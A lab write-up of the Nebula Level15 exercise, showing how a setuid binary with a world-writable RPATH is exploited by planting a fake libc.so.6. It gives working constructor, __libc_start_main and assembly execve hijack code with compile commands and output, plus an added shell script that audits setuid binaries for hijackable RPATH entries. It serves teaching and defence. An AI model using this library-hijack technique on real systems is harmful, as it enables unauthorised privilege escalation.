1. Description

Nebula is a Linux virtual machine from Exploit-Exercises for practising local privilege-escalation vulnerabilities. Its Level15 provides the vulnerable setuid program flag15:

sh-4.2$ ls -l
total 7
-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15
sh-4.2$ whoami
level15

The goal is to exploit this setuid binary to get from user level15 to user flag15 and run /bin/getflag with flag15's privileges.
2. Vulnerability Analysis

This is a classic shared-library hijacking exercise. First, run flag15 under strace and watch where the dynamic linker looks for libc:

execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0
brk(0)                                  = 0x880e000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3
...
exit_group() = ?

The program needs a shared library named libc.so.6, and the loader searches for it under /var/tmp/flag15 (first in the hardware-capability subdirectories i686/sse2/cmov, then in the directory itself) before falling back to the system library directories. /var/tmp is world-writable, so the current user (level15) can create /var/tmp/flag15 and drop a custom libc.so.6 there, which flag15 will then load; a copy in any of the hwcap subdirectories would be picked up as well, but /var/tmp/flag15/libc.so.6 is the simplest.

Looking at the ELF headers of flag15 confirms this: it has a NEEDED entry for libc.so.6 and was linked with an RPATH of /var/tmp/flag15, so the dynamic linker searches that directory first at run time. Unlike LD_PRELOAD and LD_LIBRARY_PATH, which the loader ignores when a program runs setuid (secure-execution mode), an absolute RPATH baked into the binary is honoured even for a setuid executable.

sh-4.2$ objdump -p /home/flag15/flag15

/home/flag15/flag15:     file format elf32-i386

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x000005d4 memsz 0x000005d4 flags r-x
    LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12
         filesz 0x00000108 memsz 0x00000110 flags rw-
 DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2
         filesz 0x00000034 memsz 0x00000034 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-
   RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0
         filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:
  NEEDED               libc.so.6
  RPATH                /var/tmp/flag15
  INIT                 0x080482c0
  FINI                 0x080484ac
  GNU_HASH             0x080481ac
  STRTAB               0x0804821c
  SYMTAB               0x080481cc
  STRSZ                0x0000005a
  SYMENT               0x00000010
  DEBUG                0x00000000
  PLTGOT               0x08049ff4
  PLTRELSZ             0x00000018
  PLTREL               0x00000011
  JMPREL               0x080482a8
  REL                  0x080482a0
  RELSZ                0x00000008
  RELENT               0x00000008
  VERNEED              0x08048280
  VERNEEDNUM           0x00000001
  VERSYM               0x08048276

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0
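The same condition can be checked generically: any setuid or setgid binary whose RPATH/RUNPATH points at a directory an unprivileged user can write, or can create because its parent is writable, has exactly the flag15 problem. The following POSIX shell audit is an added example, not part of the original write-up or of Nebula; the function names (hijackable_dir, check_rpath, scan_setuid) are my own, and the system-wide scan assumes readelf from binutils is installed. Run it as the unprivileged user whose view of "writable" matters, since for root every directory is writable.

```shell
#!/bin/sh
# Added example (not from the original write-up or Nebula): audit binaries
# for DT_RPATH/DT_RUNPATH search directories that an unprivileged user
# could hijack. An entry is hijackable when the directory is writable, or
# when it does not exist but its nearest existing ancestor is writable,
# which is the /var/tmp/flag15 situation (/var/tmp is world-writable).

# hijackable_dir DIR: succeed if DIR, or the directory DIR would have to
# be created in, is writable by the current user.
hijackable_dir() {
    d=$1
    while [ ! -e "$d" ]; do       # walk up to the nearest existing path
        d=$(dirname "$d")
    done
    [ -d "$d" ] && [ -w "$d" ]    # a plain file in the way means no hijack
}

# check_rpath LIST: LIST is a colon-separated rpath/runpath string. Prints
# every hijackable entry; exits 0 if any was found, 1 otherwise.
check_rpath() {
    found=1
    set -f                        # no globbing while splitting on ':'
    IFS=':'; set -- $1; unset IFS
    set +f
    for entry in "$@"; do
        case "$entry" in
            *'$ORIGIN'*)          # depends on the binary's location; not evaluated here
                continue ;;
            ""|[!/]*)             # empty or relative entry: resolved against the cwd
                printf '%s (relative: resolves against cwd)\n' "$entry"
                found=0; continue ;;
        esac
        if hijackable_dir "$entry"; then
            printf '%s\n' "$entry"
            found=0
        fi
    done
    return $found
}

# scan_setuid: run check_rpath over every setuid/setgid binary on the
# system. Needs readelf (binutils). Nothing printed means nothing found.
scan_setuid() {
    find / -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while read -r bin; do
        readelf -d "$bin" 2>/dev/null |
        sed -n 's/.*(R\(UN\)\{0,1\}PATH).*\[\(.*\)]/\2/p' |
        while read -r rp; do
            if hits=$(check_rpath "$rp"); then
                printf '%s: hijackable search path entries\n%s\n' "$bin" "$hits"
            fi
        done
    done
}

# Usage: sh rpath_audit.sh --scan
case "${1-}" in --scan) scan_setuid ;; esac
```

On the Nebula box, check_rpath "/var/tmp/flag15" run as level15 reports the directory because /var/tmp is writable, which is the hijack condition; a relative or empty entry is reported unconditionally since it resolves against whatever directory the victim is started from.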
3. Exploit
What remains is to write a custom libc.so.6 into /var/tmp/flag15 so that flag15 loads it and runs /bin/getflag with flag15's privileges.

First we need a hook that runs as soon as flag15 loads our library. There are two options. One is to declare a function with GCC's __attribute__((constructor)): the dynamic linker runs such functions during the library's initialisation (together with _init), before main is ever called. The other is to define our own __libc_start_main: the binary's _start code calls that function from libc to set up and invoke main, so if our libc.so.6 provides it, our code runs instead and main never does.

The first method:

sh-4.2$ cat constructor.c
#include <stdlib.h>   /* system() */

/* Runs when the loader initialises this library, before main. */
void __attribute__((constructor)) init(void)
{
    system("/bin/getflag");
}
Compile
gcc -shared -fPIC -o libc.so.6 constructor.c

The second method:

sh-4.2$ cat shell.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* _exit() */

/* Replaces glibc's __libc_start_main, which _start calls to run main. */
int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
                      void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end)
{
    system("/bin/getflag");
    _exit(0);   /* must not return: _start has nothing to return to */
}
Compile
gcc -shared -fPIC -o libc.so.6 shell.c

Either way the result is a libc.so.6, which we place in /var/tmp/flag15 (create the directory first; /var/tmp is world-writable).

Then run the target:

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
The relocation error says __cxa_finalize is missing. Our library was itself linked against the real libc, so the startup/teardown code gcc puts into every shared object references __cxa_finalize with version GLIBC_2.1.3; but at run time the name libc.so.6 now resolves to our own file, which does not define it. So, in either constructor.c or shell.c, we add a stub:

void __cxa_finalize(void *d) { }
Save the modified constructor.c as contructor1.c and compile again:

sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c

Then run it again:

sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
The loader also warns that our library carries no symbol version information: flag15 was linked against a libc.so.6 that defines the version GLIBC_2.0. We supply a linker version script at compile time that defines that version node (an empty node is enough to silence the warnings):

Compile and run again:

sh-4.2$ cat version
GLIBC_2.0 {};
sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference

The version warnings are gone, but the call to system still cannot be resolved. The reason is that our library is the only libc.so.6 the loader knows about: the real libc is never loaded, so our own reference to system (which the link step tagged with version GLIBC_2.0, since we linked against the real libc) has no definition anywhere. There are two ways out. One is to link the real system and everything it depends on statically into our library, so the symbol is defined in our own file; the other is to write our own system that needs nothing from libc, for example in assembly.
The first method:
sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account
/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
The second method:
sh-4.2$ cat shell.c
#include <unistd.h>   /* _exit() */

void __cxa_finalize(void *d) { }

/* system() below resolves to our assembly routine in system.s, which
   execve()s /bin/getflag and ignores its argument. */
int system(const char *cmd);

int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
                      void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end)
{
    system("/bin/getflag");
    _exit(1);   /* only reached if execve failed */
}

sh-4.2$ cat system.s
.section .text
.globl system
system:
    mov  $getflag, %ebx      # ebx = path to execute
    xor  %edx, %edx          # edx = envp = NULL
    push %edx                # argv[1] = NULL
    push %ebx                # argv[0] = "/bin/getflag"
    mov  %esp, %ecx          # ecx = argv
    mov  $11, %eax           # execve system call number on i386
    int  $0x80
.section .data
getflag:
    .ascii "/bin/getflag\0"

sh-4.2$ gcc -shared -fPIC -o libc.so.6 shell.c system.s -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account

Personally, I find the hand-written assembly easier to follow than the static-link trick. Why the static link works: -Wl,-Bstatic makes the linker pull system and everything it depends on out of libc.a into our libc.so.6, so the symbol is now defined in the very file the loader searches, and no real libc is needed. The binary's own reference to __libc_start_main@GLIBC_2.0 still fails, because the copy we pulled in carries no version (the version script only names the node), but with lazy binding that reference is not resolved until _start calls it, by which point the constructor has already run getflag; hence the success message is printed before the relocation error.
Reference
www.pwntester.com/blog/2013/11/26/nebula-level15-write-up/
https://github.com/1u4nx/Exploit-Exercises-Nebula
Vulnerabilities in dynamic link libraries under Linux